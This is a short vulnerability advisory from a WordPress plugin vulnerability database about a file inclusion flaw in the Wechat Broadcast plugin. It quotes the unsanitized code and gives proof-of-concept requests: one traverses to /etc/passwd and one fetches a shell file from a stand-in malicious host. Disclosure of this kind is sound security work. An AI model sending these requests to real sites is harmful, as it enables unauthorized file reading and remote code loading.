Lucene search

K
wpvulndbJonas LejonWPVDB-ID:3E434618-087B-4EF9-A63B-8B378C748390
HistorySep 19, 2018 - 12:00 a.m.

Wechat Broadcast <= 1.2.0 - Local/Remote File Inclusion

2018-09-1900:00:00
Jonas Lejon
wpscan.com
5

0.257 Low

EPSS

Percentile

96.7%

This bug was found in the file: /wechat-broadcast/wechat/Image.php echo file_get_contents(isset($_GET[“url”]) ? $_GET[“url”] : ‘’); The parameter “url” it is not sanitized allowing include local or remote files To exploit the vulnerability only is needed use the version 1.0 of the HTTP protocol to interact with the application.

PoC

Local File Inclusion POC: GET /wordpress/wp-content/plugins/wechat-broadcast/wechat/Image.php?url=…/…/…/…/…/…/…/…/…/…/etc/passwd Remote File Inclusion POC: GET /wordpress/wp-content/plugins/wechat-broadcast/wechat/Image.php?url= http://malicious.url/shell.txt

CPENameOperatorVersion
wechat-broadcasteq*

0.257 Low

EPSS

Percentile

96.7%